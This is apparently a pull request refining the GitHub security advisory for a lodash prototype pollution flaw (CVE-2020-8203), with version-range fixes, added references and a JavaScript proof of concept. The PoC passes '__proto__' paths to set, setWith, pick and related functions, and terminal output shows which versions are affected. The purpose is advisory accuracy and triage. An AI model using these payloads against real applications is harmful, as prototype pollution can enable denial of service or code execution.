### PR TITLE
[GHSA-p6mc-m468-83gw] Prototype Pollution in lodash

### DIFF
--- a/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json
+++ b/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json
@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-p6mc-m468-83gw",
-  "modified": "2022-02-08T22:04:28Z",
+  "modified": "2023-03-08T05:05:35Z",
   "published": "2020-07-15T19:15:48Z",
   "aliases": [
     "CVE-2020-8203"
   ],
   "summary": "Prototype Pollution in lodash",
-  "details": "Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The function zipObjectDeep allows a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires zipping objects based on user-provided property arrays.\n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.",
+  "details": "Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.\n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.",
   "severity": [
     {
       "type": "CVSS_V3",
@@ -20,20 +20,15 @@
         "ecosystem": "npm",
         "name": "lodash"
       },
-      "ecosystem_specific": {
-        "affected_functions": [
-          "lodash.baseSet"
-        ]
-      },
       "ranges": [
         {
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "0"
+              "introduced": "3.7.0"
             },
             {
-              "fixed": "4.17.20"
+              "fixed": "4.17.19"
             }
           ]
         }
@@ -44,17 +39,12 @@
         "ecosystem": "npm",
         "name": "lodash-es"
       },
-      "ecosystem_specific": {
-        "affected_functions": [
-          "lodash.baseSet"
-        ]
-      },
       "ranges": [
         {
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "0"
+              "introduced": "3.7.0"
             },
             {
               "fixed": "4.17.20"
@@ -71,10 +61,6 @@
     },
     {
       "type": "WEB",
-      "url": "https://github.com/lodash/lodash/issues/4744"
-    },
-    {
-      "type": "WEB",
       "url": "https://github.com/lodash/lodash/issues/4874"
     },
     {
@@ -86,12 +72,20 @@
       "url": "https://hackerone.com/reports/712065"
     },
     {
+      "type": "WEB",
+      "url": "https://hackerone.com/reports/864701"
+    },
+    {
       "type": "PACKAGE",
       "url": "https://github.com/lodash/lodash"
     },
     {
       "type": "WEB",
       "url": "https://security.netapp.com/advisory/ntap-20200724-0006/"
+    },
+    {
+      "type": "WEB",
+      "url": "https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744"
     },
     {
       "type": "WEB",


### PR DESCRIPTION
**Updates**
- Affected products
- Description
- References

**Comments**
## Added function names

The root cause of this vulnerability is internal function `baseSet`, which is used by multiple public functions in addition to `zipObjectDeep`. This pull request adds those additional vulnerable functions to the description, as they may not be obvious to analysts determining if their codebase is affected. For example, https://hackerone.com/reports/864701 is essentially a duplicate of the HackerOne report that [created this CVE](https://hackerone.com/reports/712065) due to the shared root cause. However, it was awarded a bounty (and received a separate [Snyk entry](https://security.snyk.io/vuln/SNYK-JS-LODASH-608086)) because it is not obvious from the older HackerOne disclosure or CVE description that `set` and `setWith` are also affected by the same bug.

This is the PoC I've been using to check affected versions:
```js
// run.js
_ = require('lodash')
console.log(`Lodash version ${_.VERSION}`)
try {
    _.set({}, "__proto__.test1", "set() vulnerable")
    console.log(test1)
} catch{}
try {
    _.setWith({}, "__proto__.test2", "setWith() vulnerable")
    console.log(test2)
} catch{}
try {
    _.zipObjectDeep(["__proto__.test3"], ["zipObjectDeep() vulnerable"])
    console.log(test3)
} catch{}
try {
    _.update({}, "__proto__.test4", (x) => "update() vulnerable")
    console.log(test4)
} catch{}
try {
    _.updateWith({}, "__proto__.test5", (x) => "updateWith() vulnerable", Object)
    console.log(test5)
} catch{}
try {
    _.pick({ __proto__: { test6: "pick() vulnerable" } }, ["__proto__.test6"])
    console.log(test6)
} catch{}
console.log("Tests complete.")
```

For completeness' sake, `pickBy` also uses `baseSet`, but it isn't vulnerable because it iterates over a list of enumerable properties and doesn't access arbitrary paths provided in the function call.

## Affected versions

### Lower bound
The above PoC found that the oldest vulnerable version of Lodash is 3.7.0, which introduces the `set` function (with vulnerable functionality eventually moving to `baseSet`). All the other vulnerable functions were added later. `pick` is technically older than `set` but its behavior matches that of the not vulnerable `pickBy` until https://github.com/lodash/lodash/commit/fd526e8754b47fd98e137eb25ce56d35929ddb43 in v4.0.0.

### Upper bound
The PoC above found that the fix was added in 4.17.17:

```shell
$ npm install lodash@4.17.16 && node run.js

added 1 package, and audited 3 packages in 3s

found 0 vulnerabilities
Lodash version 4.17.16
set() vulnerable
setWith() vulnerable
zipObjectDeep() vulnerable
update() vulnerable
updateWith() vulnerable
pick() vulnerable
Tests complete.

$ npm install lodash@4.17.17 && node run.js

changed 1 package, and audited 3 packages in 4s

found 0 vulnerabilities
Lodash version 4.17.17
Tests complete.
```

4.17.17 also matches the patch version listed in [SNYK-JS-LODASH-608086](https://security.snyk.io/vuln/SNYK-JS-LODASH-608086), which was created in response to the second HackerOne disclosure of this vulnerability.

However the [Lodash changelog](https://github.com/lodash/lodash/wiki/Changelog#v41719) lists the fix under 4.17.19 and says that versions 4.17.16–4.17.18 were corrupted (which doesn't match my current experience, but whatever).

[lodash-es](https://www.npmjs.com/package/lodash-es?activeTab=versions) doesn't have releases for versions 4.17.16–4.17.19, so its earliest patched version would be 4.17.20. I was unable to find an issue in this repository explaining the discrepancy in affected version between the advisory details (4.17.19) and metadata (4.17.20), but I'm assuming it's because NVD has no way to differentiate lodash and lodash-es given that they're the same library with differing packaging.

## References

Replaced the link to a deleted GitHub issue with an archive link and added a link to https://hackerone.com/reports/864701, which is a second disclosure for this vulnerability focusing on `set` and `setWith`.